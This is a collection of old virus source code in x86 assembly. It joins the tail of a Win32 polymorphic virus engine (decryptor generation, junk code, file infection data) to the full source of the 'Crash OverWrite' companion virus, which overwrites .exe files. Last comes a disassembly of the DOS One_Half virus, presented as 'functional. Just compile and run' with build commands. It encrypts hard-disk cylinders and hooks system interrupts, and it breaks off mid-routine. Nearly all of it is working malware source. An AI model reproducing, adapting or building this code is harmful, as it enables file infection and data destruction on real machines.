add ah, byte ptr [ebp+Reg2]

or eax, eax
jne GetOutRand
mov eax, 87654321h
inc eax

GetOutRand:
xor edx, edx ; clean edx ( needed to be able to divide later )
div ecx ; Random Numer is in EAX
; RND No. 'till ECX in EDX
ret

; ***************************************************************************
; ----------------------[ Generate a Poly Decryptor ]------------------------
; ***************************************************************************

genPoly:
and dword ptr [ebp+PolyLen], 0h

push 10h
pop ecx
call GetRand ; get a random number to start
; and save it as the new key used for all files

mov byte ptr [ebp+PolyKey], al


call GetRegs

lea edi, [ebp+PDecrypt] ; here starts the decryptor

call RandJunk
; we have 3 different ways to put
; the size in ecx and 3 different ways
; to get the starting offset in esi
push 2h ; divide by 2
pop ecx
call GetRand ; get a random number to decide what we do
; first
; we need these 2 values before we start the
; decryption loop !

; if edx = 1 we use the second one


dec edx ; chose the Order
jz SecondOrder
FirstOrder:
call GenerateESI ; esi comes first and ecx follows
call RandJunk
call GenerateECX ; and 4 different ways to get size in exc
jmp Polypreparefinished ; so there is nothing static here !

SecondOrder: ; ecx comes first and esi follows


call GenerateECX
call RandJunk
call GenerateESI

Polypreparefinished: ; we finished the preparing and can start the loop


; we need a
; xor byte ptr [esi], key ( or other crypto )
; inc esi / add esi, 1h
; loop Decryptor / dec ecx , jnz Above ..

; lenght of loop = 0
and dword ptr [ebp+LoopLen], 0
; now we choose the way we crypt this thing !

push 5h
pop ecx
call GetRand
mov dword ptr [ebp+CryptType], edx

XorDecrypt: ; we use a simple XOR BYTE PTR [ESI], KEY


dec edx
jnz NegDecrypt

mov ax, 3680h ; xor byte ptr [esi]


stosw

mov al, byte ptr [ebp+PolyKey]


stosb
; increase sizes ( we will add the last 2 bytes later )
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h

jmp EndPolyCrypto

NegDecrypt: ; neg byte ptr [esi]


dec edx
jnz NotDecrypt
mov ax, 1EF6h
stosw
jmp EndPolyCrypto

NotDecrypt: ; not byte ptr [esi]


dec edx
jnz IncDecrypt
mov ax, 16F6h
stosw
jmp EndPolyCrypto

IncDecrypt: ; inc byte ptr [esi]


dec edx
jnz DecDecrypt
mov ax, 06FEh
stosw
jmp EndPolyCrypto

DecDecrypt: ; dec byte ptr [esi]


mov ax, 0EFEh
stosw

EndPolyCrypto: ; add the last 2 bytes


add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h

call RandJunk ; more junk.. ;)

; now we need to increase esi


; to crypt the next byte
push 3h
pop ecx
call GetRand

IncESI1:
dec edx
jnz IncESI2

mov al, 46h ; do a simple inc esi


stosb

jmp EndIncESI

IncESI2: ; add esi, 1h


dec edx
jnz IncESI3

mov al, 83h


stosb
mov ax, 01C6h
stosw

jmp EndIncESI2

IncESI3: ; clc, adc esi, 1h

mov eax, 01d683f8h


stosd

add dword ptr [ebp+LoopLen], 1h


add dword ptr [ebp+PolyLen], 1h

EndIncESI2:
add dword ptr [ebp+LoopLen], 2h
add dword ptr [ebp+PolyLen], 2h

EndIncESI:
add dword ptr [ebp+LoopLen], 1h
add dword ptr [ebp+PolyLen], 1h

call RandJunk ; more, and more..

; now esi is incremented and we just have to do


; the loop
push 3h
pop ecx
call GetRand
LoopType1: ; we use the most common form : loop ;)
dec edx
jnz LoopType2

mov al, 0e2h


stosb

call StoreLoopLen

jmp EndLoopType

LoopType2: ; we do a dec ecx, jnz


dec edx
jnz LoopType3

mov ax, 7549h


stosw ; correct Loop Size ( dec ecx = 1 byte )
add dword ptr [ebp+LoopLen], 1h
call StoreLoopLen

add dword ptr [ebp+PolyLen], 1h

jmp EndLoopType

LoopType3:
mov eax, 0F98349h ; dec ecx cmp ecx, 0h
stosd
add dword ptr [ebp+LoopLen], 4h
mov al, 75h ; jne
stosb
add dword ptr [ebp+PolyLen], 3h
call StoreLoopLen

EndLoopType:
add dword ptr [ebp+PolyLen], 2h

mov byte ptr [edi], 0C3h ; save the ending ret


add dword ptr [ebp+PolyLen], 2h

mov eax, VirusSize ; calculate the new size for the virus
add eax, dword ptr [ebp+PolyLen]
mov dword ptr [ebp+VirLen], eax

ret

StoreLoopLen:
xor eax, eax ; calculate the size for the loop
mov ax, 100h
sub eax, dword ptr [ebp+LoopLen]
sub eax, 2h
stosb
ret

; ***************************************************************************
; --------------------------[ Insert Junk Code ]----------------------------
; ***************************************************************************
RandJunk: ; edi points to the place where they will be stored
; we will insert 1-8 junk instructions
push 7d ; each time this routine is called
pop ecx
call GetRand
xchg ecx, edx
inc ecx

push ecx

RandJunkLoop:
push ecx

push 8h
pop ecx
call GetRand ; get a random number from 0 to 7
xchg eax, edx

lea ebx, [ebp+OpcodeTable]


xlat ; get the choosen opcode
stosb ; and save it to edi
xor eax, eax ; clean eax
; get first Register
mov al, byte ptr [ebp+Reg1]
shl eax, 3h ; multiply with 8
add eax, 0c0h ; add base
; add the second register
add al, byte ptr [ebp+Reg2]
stosb ; save opcode

XchangeRegs: ; we get new ones and exchange them


Call GetRegs ; cause the rnd - generator relies on them *g*
mov al, byte ptr [ebp+Reg1]
mov ah, byte ptr [ebp+Reg2]
mov byte ptr [ebp+Reg1], ah
mov byte ptr [ebp+Reg2], al

pop ecx ; restore ecx


loop RandJunkLoop ; and loop

pop ecx ; we need the additional lenght


shl ecx, 1 ; multiply with 2
; save it
add dword ptr [ebp+LoopLen], ecx
add dword ptr [ebp+PolyLen], ecx

ret

OpcodeTable:
db 08Bh ; mov
db 033h ; xor
db 00Bh ; or
db 02Bh ; sub
db 003h ; add
db 023h ; and
db 013h ; adc
db 01Bh ; sbb

GetRegs: ; select two registers to use


; set to Error
pushad
mov byte ptr [ebp+Reg1], -1
mov byte ptr [ebp+Reg2], -1

lea edi, [ebp+Reg1]


mov ecx, 2
; now we choose 2 registers we use

NextReg: ; to make the junk code look realistic


push ecx
push 8h
pop ecx
call GetRand
pop ecx

cmp edx, 1h ; we will not use ECX


je NextReg
cmp edx, 4h ; ESP
je NextReg
cmp edx, 6h ; or ESI, cause these values are important
je NextReg ; for the decryptor or the virus to work.
mov al, dl ; save it
stosb
loop NextReg

popad
ret

; ***************************************************************************
; -------------------------[ Get esi from stack ]----------------------------
; ***************************************************************************

GenerateESI:
; the first thing we do is to get the
; start of the crypted code, this is simpel,
; it is our return address, so we get it from
; stack
; there are 3 different ways we can do this
push 3h
pop ecx
call GetRand
dec edx ; which way to we use ?

jnz ESI2

ESI1:
lea esi, [ebp+movESI] ; use the mov esi, [esp] instruction
movsw ; 3 bytes long
movsb
add dword ptr [ebp+PolyLen], 3h

jmp EndESI ; get back


ESI2: ; we simply pop esi and push it again
dec edx
jnz ESI3

mov al, 5eh ; pop esi


stosb
mov al, 56h
stosb ; push esi
add dword ptr [ebp+PolyLen],2h
jmp EndESI

ESI3:
push 5h
pop ecx
call GetRand
xchg eax, edx
cmp al, 1h ; if we got ecx, we use eax
jne ESI3b
xor eax, eax

ESI3b:
mov edx, eax
push edx ; save edx
add eax, 58h ; pop a register

stosb

pop eax ; push the value again


push eax
add eax, 50h
stosb

mov al, 08bh ; and finally move it to esi


stosb
pop eax
mov al, 0f0h
add al, dl
stosb
add dword ptr [ebp+PolyLen], 4h

EndESI:
ret

; code to retrieve the start of crypt-code


movESI db 8bh, 34h, 24h ; mov esi, [esp]

; ***************************************************************************
; --------------------------[ Move the size to ECX ]-------------------------
; ***************************************************************************

GenerateECX: ; here we put the size of the crypted


; part in ecx

push 3h
pop ecx
call GetRand ; random Nr in edx
inc edx ; increase

ECX1: ; use a simple mov


dec edx
jnz ECX2
mov al, 0b9h ; mov
call StoreALValue

jmp EndECX

ECX2: ; let's use a push ( value )


dec edx ; pop ecx
jnz ECX3

mov al, 068h ; push


call StoreALValue

mov al, 59h ; save the pop ecx


stosb
add dword ptr [ebp+PolyLen], 1h

jmp EndECX

ECX3:
push -1
pop ecx
call GetRand
mov eax, VirusSize
shl edx, 26d
shr edx, 26d
sub eax, edx

push eax ; mov ecx, Size - X


mov al, 0b9h
stosb ; and the size we need to decrypt
pop eax
stosb
call StoShrEAX

mov ax, 0c181h ; add ecx, X


stosw
xor eax, eax
mov al, dl

stosb
call StoShrEAX
add dword ptr [ebp+PolyLen], 11d

jmp EndECX ; finish

StoreECX: ; save the mov


push ax ; save the register

mov al, 0b8h ; save the mov reg, size


add al, dl
call StoreALValue

mov al, 03h ; add ecx, reg


stosb
pop ax ; get the chosen register
add al, 0c8h
stosb

add dword ptr [ebp+PolyLen], 4h

EndECX: ; let's return


ret

StoShrEAX: ; to save dwords backwards


push 3
pop ecx
StoShrEAXLoop:
shr eax, 8
stosb
loop StoShrEAXLoop
ret

StoreALValue: ; we store the instruction in al


stosb ; and the size we need to decrypt
mov eax, FirstLSize ; eax, size
stosb
call StoShrEAX

add dword ptr [ebp+PolyLen], 5h


add dword ptr [ebp+LoopLen], 5h
ret

; ***************************************************************************
; -------------------[ Data which does not travel ]--------------------------
; ***************************************************************************
VirusEnd: ; ok, this data will travel, but will be generated
; new on each run

PDecrypt: ; here will we add the polymorphic


; decryption routine later, but not included
; into 1.st generation
ret ; so we just return

db 150d dup (0h) ; we keep 150 bytes free, so we have a buffer


; for the poly decryptor

; here we save the data which does not


; travel which each copy of the virus

PolyKey db (?) ; key for the poly decryptor


PolyLen dd (?) ; lenght of decryptor
VirLen dd (?) ; virus lenght + decryptor
LoopLen dd (?) ; lenght of the decryption loop
CryptType dd (?) ; we save which kind of encryption we use

Reg1 db (?) ; here we save the registers we use for the junk
Reg2 db (?) ; code

SEH_Save dd (?) ; We save the original SEH

; Handles of the dll's we use


K32Handle dd (?) ; Kernel32.dll might be nessecairy *g*
IHLHandle dd (?) ; Imagehlp.dll to create checksums
ADVHandle dd (?) ; Advapi32.dll for registry access
W32Handle dd (?) ; Winsck32.dll for pinging

; The Offsets of the API's we use


XLoadLibraryA dd (?) ; Here we save their Offset
XGetProcAddress dd (?)
XFindFirstFileA dd (?)
XFindNextFileA dd (?)
XFindClose dd (?)
XCreateFileA dd (?)
XSetFileAttributesA dd (?)
XCloseHandle dd (?)
XCreateFileMappingA dd (?)
XMapViewOfFile dd (?)
XUnmapViewOfFile dd (?)
XGetWindowsDirectoryA dd (?)
XGetSystemDirectoryA dd (?)
XGetCurrentDirectoryA dd (?)
XSetCurrentDirectoryA dd (?)
XGetFileAttributesA dd (?)
XGetTickCount dd (?)
XCreateThread dd (?)
XGetSystemTime dd (?)

XCheckSumMappedFile dd (?)

XRegOpenKeyExA dd (?)
XRegQueryValueExA dd (?)
XRegCloseKey dd (?)

Xsocket dd (?)
XWSACleanup dd (?)
XWSAStartup dd (?)
Xclosesocket dd (?)
Xsendto dd (?)
Xsetsockopt dd (?)

; Data to search Kernel


KernelAddy dd (?) ; Pointer to kernel PE-Header
MZAddy dd (?) ; Pointer to kernel MZ-Header

RegHandle dd (?) ; Handle to open Reg-Key

; Directory's
windir db 7Fh dup (0) ; here we save the directory's
curdir db 7Fh dup (0) ; we want to infect

; some data for infection


counter dw (?) ; a counter to know how many names we have compared
ATableVA dd (?) ; the Address Table VA
NTableVA dd (?) ; the Name Pointer Table VA
OTableVA dd (?) ; the Name Pointer Table VA

NewSize dd (?) ; we save the new size of the file here


CheckSum dd (?) ; checksum
HeaderSum dd (?) ; crc of header

; Data to find files

WIN32_FIND_DATA label byte


WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db 260d dup (?)
WFD_szAlternateFileName db 13 dup (?)
WFD_szAlternateEnding db 03 dup (?)

FileHandle dd (?) ; handle of file


MapHandle dd (?) ; Handle of Map
MapAddress dd (?) ; offset of Map

Attributes dd (?) ; saved File-Attributes


threadID dd (?) ; payload runs in an extra thread
; we need this buffer for follwing
; the shortcuts
Buffer db 337d dup (?)
; this buffer is nessecairy
; to create a winsock connection ( ping )
WSA_DATA db 400d dup (0)

SystemTime: ; needed to get the current day


wYear dw (?)
wMonth dw (?)
wDayOfWeek dw (?) ; Sunday = 0, Monday = 1 .. etc.
wDay dw (?)
wHour dw (?)
wMinute dw (?)
wSecond dw (?)
wMilliseconds dw (?)

EndBufferData:
; ***************************************************************************
; ------------------------[ That's all folks ]-------------------------------
; ***************************************************************************
end Virus
; comment *
;
; Name: Crash OverWrite :-)
; Coder: BeLiAL
;
; This is my first win32 virus.Its only a
; companionvirus but it does his work very
; well.Its perhaps coded a bit lame but
; im sure nobody will care.It infects the
; first file in the directory and renames
; the victimfile to .dat .I perhaps i
; make it resident or infecting more file...
; Greetings and thanx go out
; to Evul,Toro,Padisah and Wallo.
;
; BeLiAL
;*

.386
.model flat
Locals
Jumps

Extrn FindFirstFileA :PROC


Extrn FindNextFileA :PROC
Extrn CreateFileA :PROC
Extrn WriteFile :PROC
Extrn ReadFile :PROC
Extrn GlobalAlloc :PROC
Extrn GlobalFree :PROC
Extrn ExitProcess :PROC
Extrn WinExec :PROC
Extrn CopyFileA :PROC
Extrn CloseHandle :PROC
Extrn SetFilePointer :PROC
Extrn GetFileSize :PROC

.data

MAX_PATH EQU 0ffh


FALSE EQU 0
changeoffset EQU 094fh
winsize EQU 05h

FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends

WIN32_FIND_DATA struct
dwFileAttributes DWORD ?
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)
cAlternate BYTE 0eh dup(?)
ends
FindFileData WIN32_FIND_DATA <>
memptr dd 0
counter1 dd 0
filehandle dd 0
filesize dd 00001000h
exefile db '*.exe',0
myname db 'crashoverwrite.exe',0
dd 0
dd 0
secbuffer dd 0
dd 0
dd 0
dd 0
db '[Crash OverWrite] coded by BeLiAL'

.code

start:
push offset FindFileData
push offset exefile
call FindFirstFileA
already_infected:
mov eax,dword ptr nFileSizeLow.FindFileData
cmp eax,00001000h
je reanimate
mov eax,offset cFileName.FindFileData
find_dot1:
cmp byte ptr ds:[eax],'.'
je next_step1
add eax,1
jmp find_dot1
next_step1:
add eax,1
push eax
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
mov ebx,offset cFileName.FindFileData
mov eax,offset secbuffer
find_dot2:
mov dh,byte ptr ds:[ebx]
cmp edx,0
je next_step2
mov byte ptr ds:[eax],dh
add ebx,1
add eax,1
jmp find_dot2
next_step2:
pop eax
push FALSE
push offset secbuffer
mov byte ptr ds:[eax],'e'
add eax,1
mov byte ptr ds:[eax],'x'
add eax,1
mov byte ptr ds:[eax],'e'
push offset cFileName.FindFileData
call CopyFileA
push FALSE
push offset cFileName.FindFileData
push offset myname
call CopyFileA
open_victim:
push 0
push 080h
push 3h
push 0h
push 0h
push 0c0000000h
push offset FindFileData.cFileName
Call CreateFileA
mov filehandle,eax
cmp eax,0ffffffffh
je reanimate
getmemory:
push filesize
push 0
Call GlobalAlloc ;get the memory
mov edx,eax
cmp eax,0
je close_file
push edx
copyinmemory:
push 0
push offset counter1
push filesize
push edx
push filehandle
Call ReadFile
pop edx
mov dword ptr memptr,edx ;for later use
add edx,changeoffset
mov eax,offset cFileName.FindFileData
modify_victim:
mov bh,byte ptr ds:[eax]
mov byte ptr ds:[edx],bh
cmp bh,0
je set_pointer
add eax,1
add edx,1
jmp modify_victim
set_pointer:
push 0
push 0
push 0
push filehandle
call SetFilePointer
copy_to_file:
push 0
push offset counter1
push filesize
push memptr
push filehandle
call WriteFile
close_file:
push filehandle
call CloseHandle
reanimate:
mov eax,offset myname
find_dot3:
mov bx,word ptr ds:[eax]
cmp bx,'e.'
je next_step3
cmp bx,'E.'
je next_step3
add eax,1
jmp find_dot3
next_step3:
add eax,1
mov byte ptr ds:[eax],'d'
add eax,1
mov byte ptr ds:[eax],'a'
add eax,1
mov byte ptr ds:[eax],'t'
add eax,1
mov byte ptr ds:[eax],00h
that_was_all:
push winsize
push offset myname
call WinExec
final:
push 0
call ExitProcess

ends
end start
; Virus One_Half
; Disassembly done by Ratter

; It's a polymorfic reverzibel multiparit virus from Slovak coder known


; under the nick Vyvojar(==Developer). It's also author of Level3.
; This is a disassembly I enjoyed the most. It's a one of the best virus
; in the dead world of DOS.
; It's functional. Just compile and run :)

; To Vyvojar: If ya're still living, could ya pls lemme know about it?
; I would be very happy if i could speak with you sometimes ...
; To otherz who are reading this: Pls lemme know if there's any bug in the code.
; Or just to say ya like this :)
; You can reach me on Undernet channel #virus, #3c or via email: ratter@atlas.cz

; Compile:
; tasm /t/m2 one_half.asm
; tlink /t one_half.obj

.486p

.487

seg_a segment byte public use16


assume cs:seg_a, ds:seg_a

org 100h

one_half proc far


start:
jmp loc_08d1 ; jmp to viruz_start
;jmp loc_0208 ; jmp to decode routine_start

db 101 dup (0)


loc_0168:
db 81h,0C0h,0FEh, 6Eh ; add ax, 6EFEh
jmp loc_056c
;
db 19 dup (0)
loc_0182:
cld
std
jnz short loc_01B1
jmp loc_08D1
;
db 40 dup (0)
;
loc_01B1:
xor [di], ax
jmp short loc_0168
;
db 64 dup (0)
;
loc_01f5:
db 2eh ; cs:
mov di, 582h
db 36h ; ss:
db 3eh ; ds:
jmp loc_049b
;
db 10 dup (0)
;
loc_0208:
push ax
nop
db 36h ; ss:
sti
db 36h ; ss:
clc
sti
jmp loc_0381
;
db 367 dup (0)
;
loc_0381:
push cs
cld
jmp loc_047c
;
db 246 dup (0)
;
loc_047C:
nop
sti
db 36h ; ss:
clc
nop
pop ds
db 36h ; ss:
jmp loc_01f5
;
db 21 dup (0)
;
loc_049b:
cld
db 3eh ; ds:
mov ax, 0bfbah
db 3eh ; ds:
std
jmp loc_01b1
;
db 148 dup (0)
;
loc_0539:
db 81h,0FFh, 5Ah, 13h ; cmp di, 135ah
sti
jmp loc_0182
;
db 43 dup (0)
;
loc_056c:
clc
sti
cmc
db 3eh ; ds:
nop
inc di
db 36h ; ss:
jmp loc_0539
pop ss
;
db 12 dup (0)
;

;
loc_0582:
;
p label near
p_ equ offset the_second_part - offset boot_start
p__ equ presun_rutiny + (p - buffer)
;
_mcb_ db 'Z' ; it'z last_block
dw 9F01h ; PSP
dw 0FFh ; 4096 bytez
db 3 dup(?) ; reserved
db 'COMMAND', 0 ; blockz_owner_name ...
;
exe_header dw 20CDh ; exe_signature
part_pag dw 501eh
page_cnt dw 09b4h
relo_cnt dw 0
hdr_size dw 21cdh
min_mem dw 1f58h
max_mem dw 0bac3h
relo_ss dw 03d0h
exe_sp dw 0efe8h
exe_flag db 00h ; checksum
db 0b4h
exe_ip dw 0100h
relo_cs dw 0FFF0h
tabl_off dw 0BA05h
;
decode_routine_table:
dw 0208h ; here'z the table
dw 0381h ; of offsetz, where are
dw 047ch ; the chunkz of code of
dw 01f5h ; decode_routine
dw 049bh
xor_offset dw 01b1h
dw 0168h
dw 056ch
dw 0539h
jnz_offset dw 0182h
;
beginning_ofs dw 07beh
;
overwritten_bytez:
db 06h, 83h, 05h, 00h, 00h, 2Eh
db 8Ch, 0Eh, 85h, 05h, 4Fh, 02h
db 00h, 2Eh,0A1h,0A3h, 05h, 26h
db 0C7h
db 'G.com <jmen'
db 0Bh, 26h, 3Ah, 47h, 21h,0BAh
db 4Ah, 05h, 0Fh
db '„_driveru>', 0Ah, 't'
db 0FFh,0C6h, 44h,0FFh, 00h,0B8h
db 03h, 4Bh,0BBh, 80h, 00h, 8Ah
db 0Ch, 0Ah,0C9h,0BAh, 68h, 04h
db 0Fh
db 'ys ...', 0Ah, 0Dh, '$'
db 17h
db 'instalovan'
db 02h,0EBh, 03h,0E9h, 43h, 02h
db 4Eh, 56h, 89h, 36h
;

;
hdr_size_ dw 10h
date_div dw 1Eh
page_size_ dw 200h
;

; Here starts boot_version of One_Half


boot_start:
xor bx, bx
cli
mov sp, 07c00h ; set up stack
mov ss, bx ; 2 0000h:7c00h
sti
mov ds, bx
sub word ptr ds:[413h], 4 ; dec mem_size o 4 kila
mov cl, 6
int 12h ; gimme mem_size
shl ax, cl ; count the segment
mov dx, 80h ; first harddisk, 0. head
mov es, ax ; my_new_seg 2 es
db 0b9h ; mov cx, ?
viruz_start_sec dw 0bh ; gimme virus_start_sec
mov ax, 0207h ; read 7 secz
push es ; (viruz_body)
int 13h
mov ax, offset the_second_part - p
push ax
retf ; go2 new_segment_part
;
the_second_part:
mov word ptr ds:[21h * 4 + 2], cs; store cs 2 21h * 4 + 2
mov ax, word ptr ds:[46ch] ; gimme tick_counter
push ds
push cs ; make ds = cs
pop ds
mov word ptr ds:[mov_bx_? - p], ax ; store counter
mov ax, cs
inc ax
mov word ptr ds:[_mcb_ + 1 - p], ax ; store block_owner
mov byte ptr ds:[run_jmp - p], 0; nulluj displ8 2 set our
; own _mcb_ as last_one
call sub_078b ; move presun_rutiny
pop es
mov bx, sp ; 7c00h 2 bx
push es
mov si, word ptr es:[bx+p_] ; gimme cur_cyl_number_
; _2_crypt
db 81h, 0feh ; cmp si, ?
lowest_cyl dw 07h ; less than lowest_cyl ?
jbe loc_06d6
push si ; nope
sub si, 2 ; ok crypt 2 cylinderz
mov word ptr ds:[not_crypt_cyl - p], si ; store cyl - 2
pop si
mov ah, 08h ; gimme drivez_paramz
int 13h
jc loc_06d6 ; error ?
mov al, cl ; gimme max_sec_number
and al, 03fh ; voklesti max_sec
mov byte ptr ds:[secz_count - p__], al ; secz_2_crypt
mov cl, 1 ; starting_sec 2 cl
mov bh, 7eh ; buffer_ptr 2 7e00h
mov word ptr ds:[buf_ptr - p__], bx ; store buffer_ptr
mov dl, 80h ; set up drive 2 first harddisk
loc_069E:
dec si ; dec cylinder_number
call sub_0798 ; convert cyl_number
push dx
loc_06A3:
mov ah, 2 ; read 1 cylinder
push ax
int 13h
pop ax
jc short loc_06B4 ; error ?
db 0e8h ; call crypt_
dw offset crypt_ - presun_rutiny + buffer - next_
next_ label near ; crypt_ it
inc ah ; make function 03h
push ax
int 13h ; and write crypted_cyl
pop ax
loc_06B4:
jc short loc_072B ; error ?
test dh, 3Fh ; last head ?
jz short loc_06BF
dec dh ; dec head
jmp short loc_06A3 ; and go on
loc_06BF: ; yope
pop dx
db 81h, 0feh ; cmp si, ?
not_crypt_cyl dw 1bfh ; ok 2 cylinderz crypted_ ?
ja loc_069E
loc_06C6: ; yope
mov bh, 7Ch ; buffer 2 7c00h
mov es:[bx+p_], si ; store new cur_cyl_number_2_
mov ax, 301h ; _crypt
mov cx, 1 ; and write partition_table
mov dh, ch ; (boot_start) back
int 13h
loc_06D6:
mov ds:[cur_cyl_number - p__], si
db 81h, 0feh ; cmp si, ?
one_half_cyl dw 136h ; more than one_half_crypted ?
ja short loc_06E3
call sub_07EC ; ok try 2 write text
loc_06E3: ; nope not yet
mov ax, 201h ; ok now read
mov bx, 7C00h ; 2 buffer 7c00h
mov cx, ds:[viruz_start_sec - p] ; gimme viruz_...
dec cx ; go2 orig_partition_table
mov dx, 80h ; orig_partition_table
int 13h
cli
les ax, dword ptr es:[13h * 4] ; gimme old_int_13h
mov ds:[old_int_13h - p__], ax ; and store it
mov ds:[old_int_13h - p__ + 2], es
pop es
push es
les ax, dword ptr es:[1ch * 4] ; gimme old_int_1ch
mov ds:[old_int_1ch - p], ax ; and store it
mov ds:[old_int_1ch - p + 2], es
pop es
push es ; set up my own
mov word ptr es:[13h * 4], offset new_int_13h - p__
mov word ptr es:[13h * 4 + 2], cs ; new_int_13h
mov word ptr es:[1ch * 4], offset new_int_1ch - p
mov word ptr es:[1ch * 4 + 2], cs ; and new_int_1ch
sti
push bx
retf ; and jump 2 orig_partition

; Diz uncryptz_cylinderz if any error occurez


loc_072B:
xor ah, ah
push ax
int 13h ; try 2 reset the disk
pop ax
loc_0731:
inc dh ; inc head
mov ah, dh ; head 2 ah
pop dx ; pop max_head
push dx
cmp ah, dh ; cmp cur_head with max_head
ja short loc_074E ; above ?
mov dh, ah ; cur_head 2 dh
mov ah, 2 ; read cylinder
push ax
int 13h
pop ax
db 0e8h ; call crypt_
dw offset crypt_ - presun_rutiny + buffer - next__
next__ label near ; uncrypt_ it
inc ah
push ax
int 13h ; and write it back
pop ax
jmp short loc_0731
loc_074E: ; yope (error on first_cyl)
pop dx ; pop max_head
inc si ; inc cyl_number
jmp loc_06C6 ; and end with crypt_

new_int_1ch:
push ax
push ds
push es
xor ax, ax
mov ds, ax
les ax, dword ptr ds:[21h * 4] ; gimme int_21h
mov cs:[old_int_21h - p__], ax ; store offset
mov ax, es ; gimme seg
cmp ax, 800h ; are we under 800h ?
ja short loc_0783
mov word ptr cs:[old_int_21h - p__ + 2], ax ; yope
; we've got dos_int_21h_seg
les ax, dword ptr cs:[old_int_1ch - p]; gimme old_int_1ch
mov ds:[1ch * 4], ax ; restore it back
mov word ptr ds:[1ch * 4 + 2], es
mov word ptr ds:[21h * 4], offset new_int_21h - p;and set up
mov word ptr ds:[21h * 4 + 2], cs ; my new_int_21h
loc_0783: ; nope
pop es
pop ds ; restore regz
pop ax ; and
db 0EAh ; jmp far ptr old_int_1ch
old_int_1ch dw 0FF53h, 0F000h

one_half endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz movez some routinez ...
sub_078B proc near
mov si, offset presun_rutiny - p
mov di, offset buffer - p
mov cx, offset f_read_ - offset presun_rutiny - 4
cld
rep movsb
retn
sub_078B endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz makez from cyl_number_in_si valid cx_reg
sub_0798 proc near
push ax
mov ax, si
mov ch, al
push cx
mov cl, 4
shl ah, cl
pop cx
mov al, 3Fh ; '?'
and dh, al
and cl, al
not al
push ax
and ah, al
or dh, ah
pop ax
shl ah, 1
shl ah, 1
and ah, al
or cl, ah
pop ax
retn
sub_0798 endp

text_ db 'Dis is one half.', 0Dh, 0Ah, 'Pr'


db 'ess any key to continue ...', 0Dh
db 0Ah

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz writez text if run_counter is even and it iz even day etc.
sub_07EC proc near
mov ah, 4 ; gimme CMOS date_&_time
int 1Ah
jc short loc_ret_0816
test dl, 3 ; day even etc. ?
jnz short loc_ret_0816
test word ptr ds:[run_counter - p], 1; run_counter is even
jnz short loc_ret_0816
mov cx, offset sub_07ec - offset text_; gimme text_length
mov si, offset text_ - p ; gimme text_offset
mov ah, 0Fh ; gimme cur_video_page_number
int 10h ; why ?
mov bl, 7
mov ah, 0Eh ; print char 2 cur_page ...
locloop_080D:
lodsb ; gimme byte
int 10h
loop locloop_080D ; and go on

xor ah, ah ; wait 4 keyprezz


int 16h

loc_ret_0816:
retn ; and end ...
sub_07EC endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz int_21h_file_fc with a handle in bx
sub_0817 proc near
push bx
db 0bbh ; mov bx, ?
handle_ dw 0 ; gimme handle
int 21h ; call int_21h
pop bx
retn ; and end ...
sub_0817 endp

;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
; Diz callz int_13h
int_13h proc near
pushf
cli
db 9Ah ; call far ptr int_13h_addr
int_13h_addr dw 774h, 70h
retn
int_13h endp

; This is used for int_13h tracing


new_int_01h:
push bp
mov bp, sp
db 0ebh
jump_patch_? db offset loc_084f - ($ + 1); jmp short loc_084F
db 81h, 7eh, 04h ; cmp word ptr [bp+4], ?
which_segment_? dw 0253h
ja short loc_0853
push ax
push bx
push ds
lds ax, dword ptr [bp+2]
